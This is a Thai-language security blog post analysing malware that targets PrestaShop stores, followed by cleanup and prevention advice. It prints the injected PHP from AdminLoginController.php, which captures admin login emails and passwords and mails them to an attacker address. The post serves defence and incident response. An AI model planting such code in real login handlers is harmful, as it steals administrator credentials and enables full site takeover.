ในฐานะที่เป็นแพลตฟอร์มอีคอมเมิร์ซที่กำลังเติบโต Prestashop เป็นเป้าหมายใหญ่สำหรับแฮกเกอร์ที่ต้องการขโมยข้อมูล โดยปกติ ข้อมูลที่กำหนดเป้าหมายคือหมายเลขบัตรเครดิต แต่เมื่อเร็ว ๆ นี้นักวิจัยของเราได้ค้นพบมัลแวร์ขโมยข้อมูลประจำตัวประเภทใหม่ที่กำหนดเป้าหมายไปยังไซต์ Prestashop และขโมยข้อมูลประจำตัวของผู้ดูแลระบบไซต์ ซึ่งอาจนำไปสู่การครอบครองเว็บไซต์ของคุณโดยสมบูรณ์
วิธีการทำงานของมัลแวร์ขโมยข้อมูลประจำตัวของ Prestashop
มัลแวร์ที่ขโมยข้อมูลประจำตัวของ Prestashop ตามที่พบในไฟล์ ./controllers/admin/AdminLoginController.php
บนเว็บไซต์ Prestashop แบบนี้:
public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
รหัสนี้ใช้เพื่อส่งข้อมูลเซิร์ฟเวอร์ไปยังตัวแปร ตัวแปรที่ส่งผ่านบางส่วนรวมถึงชื่อผู้ใช้และรหัสผ่านที่ใช้ในการเข้าสู่ระบบแบ็คเอนด์ของ Prestashop ข้อมูลที่รวบรวมนี้ถูกส่งไปยังที่อยู่อีเมลของแฮ็กเกอร์เป็นครั้งคราวโดยใช้ PHP mail() function
.
อีเมลที่ส่งมีทุกสิ่งที่ผู้โจมตีจำเป็นต้องลงชื่อเข้าใช้ไซต์ Prestashop ที่ถูกแฮ็ก จากที่นั่น พวกเขาสามารถเข้าถึงไซต์ได้ ซึ่งช่วยให้พวกเขาเข้าถึงส่วนต่อประสานส่วนหลังของเว็บไซต์ของคุณได้อย่างสมบูรณ์ ซึ่งหมายความว่าพวกเขาสามารถเปลี่ยนแปลงเนื้อหา ติดตั้งโมดูลหรือปลั๊กอินปลอม/ติดไวรัส และทำสิ่งต่างๆ ได้อีกมากมาย
ในบางกรณี ผู้ที่ตกเป็นเหยื่อของการแฮ็กนี้เริ่มได้รับอีเมลตีกลับ ซึ่งอาจเป็นเพราะ Google ตรวจพบการโจมตีและปิดใช้งาน/รายงานบัญชีที่เกี่ยวข้อง
เชื่อว่ากลุ่มผู้โจมตี/แฮ็กเกอร์ที่ใช้แคมเปญติดมัลแวร์นี้มีชื่อว่า bajatx / B4JAT4T
วิธีแก้ไขไซต์ของคุณหลังจากการติดมัลแวร์ Prestashop Credential Stealing Malware
1. สำรองข้อมูลไซต์ของคุณก่อนทำความสะอาด
ขอแนะนำให้ใช้เว็บไซต์แบบออฟไลน์เพื่อที่ผู้ใช้จะไม่เข้าชมหน้าที่ติดไวรัสในขณะที่คุณกำลังทำความสะอาด อย่าลืมสำรองข้อมูลไฟล์หลักและฐานข้อมูลทั้งหมด ขอแนะนำให้สำรองข้อมูลในรูปแบบไฟล์บีบอัด เช่น .zip
2. แทนที่ไฟล์หลัก ปลั๊กอิน และธีม
คุณสามารถแทนที่ไฟล์หลักที่ติดไวรัสด้วยไฟล์เวอร์ชันดั้งเดิมจากแหล่งที่เชื่อถือได้ หลังจากดาวน์โหลดไฟล์และไดเร็กทอรีเวอร์ชันใหม่และอัปเดตแล้ว คุณสามารถลบไฟล์ที่เก่ากว่าได้ นี่เป็นสิ่งสำคัญอย่างยิ่งในการกำจัดมัลแวร์ที่ขโมยข้อมูลประจำตัวของ Prestashop เนื่องจากพบโค้ดที่เป็นอันตรายในไฟล์หลัก
3. ทำความสะอาดไฟล์ที่น่าสงสัยที่เพิ่งแก้ไข
คุณอาจพบไฟล์ที่อาจติดไวรัสโดยดูจากไฟล์ที่เพิ่งแก้ไข คุณสามารถกู้คืนไฟล์เหล่านี้จากการสำรองข้อมูลใหม่ทั้งหมดที่คุณมีหรือจากแหล่งที่เชื่อถือได้
4. เรียกใช้การสแกนมัลแวร์
เรียกใช้การสแกนมัลแวร์บนเว็บเซิร์ฟเวอร์ของคุณเพื่อหามัลแวร์และไฟล์ที่เป็นอันตราย คุณสามารถใช้เครื่องมือ 'Virus Scanner' ใน cPanel ที่โฮสต์เว็บของคุณจัดเตรียมไว้ให้ หรือล้างมัลแวร์โดยผู้เชี่ยวชาญด้วย Astra Pro Plan ซึ่งจะบล็อกการโจมตีและบอทที่พยายามดาวน์โหลดข้อมูลที่ถูกขโมย
นอกเหนือจากขั้นตอนเหล่านี้ คุณอาจพบว่าบทความนี้เกี่ยวกับความปลอดภัยของ Prestashop มีประโยชน์
วิธีป้องกันการโจมตีเพิ่มเติม
หลังจากแก้ไขไซต์ของคุณแล้ว ต่อไปนี้คือแนวทางปฏิบัติด้านความปลอดภัยที่ดีบางประการที่ควรปฏิบัติตามเพื่อให้แน่ใจว่าเว็บไซต์ของคุณจะปลอดภัยจากมัลแวร์ที่ขโมยข้อมูลประจำตัวของ Prestashop:
- ตรวจสอบให้แน่ใจว่าคุณกำลังเรียกใช้การอัปเดตล่าสุดของซอฟต์แวร์ของคุณ
- ใช้ตัวประมวลผลการชำระเงินบุคคลที่สามที่เชื่อถือได้
- ดำเนินการสแกนมัลแวร์/ตรวจสอบความปลอดภัยเป็นประจำ
- ลงทุนในไฟร์วอลล์
วิธีเดียวที่มั่นใจได้ในการปกป้องเว็บไซต์ของคุณจากวิธีการของแฮ็กเกอร์ที่พัฒนาตลอดเวลาคือการลงทุนในการรักษาความปลอดภัย เป็นความคิดที่ดีที่จะลงทุนในไฟร์วอลล์ของเว็บไซต์ เรียกใช้การสแกนมัลแวร์บ่อยๆ และรับการตรวจสอบความปลอดภัยเป็นประจำ เนื่องจากจะทำให้คุณมีแนวคิดที่ดีเกี่ยวกับความปลอดภัยโดยรวมของเว็บไซต์ของคุณ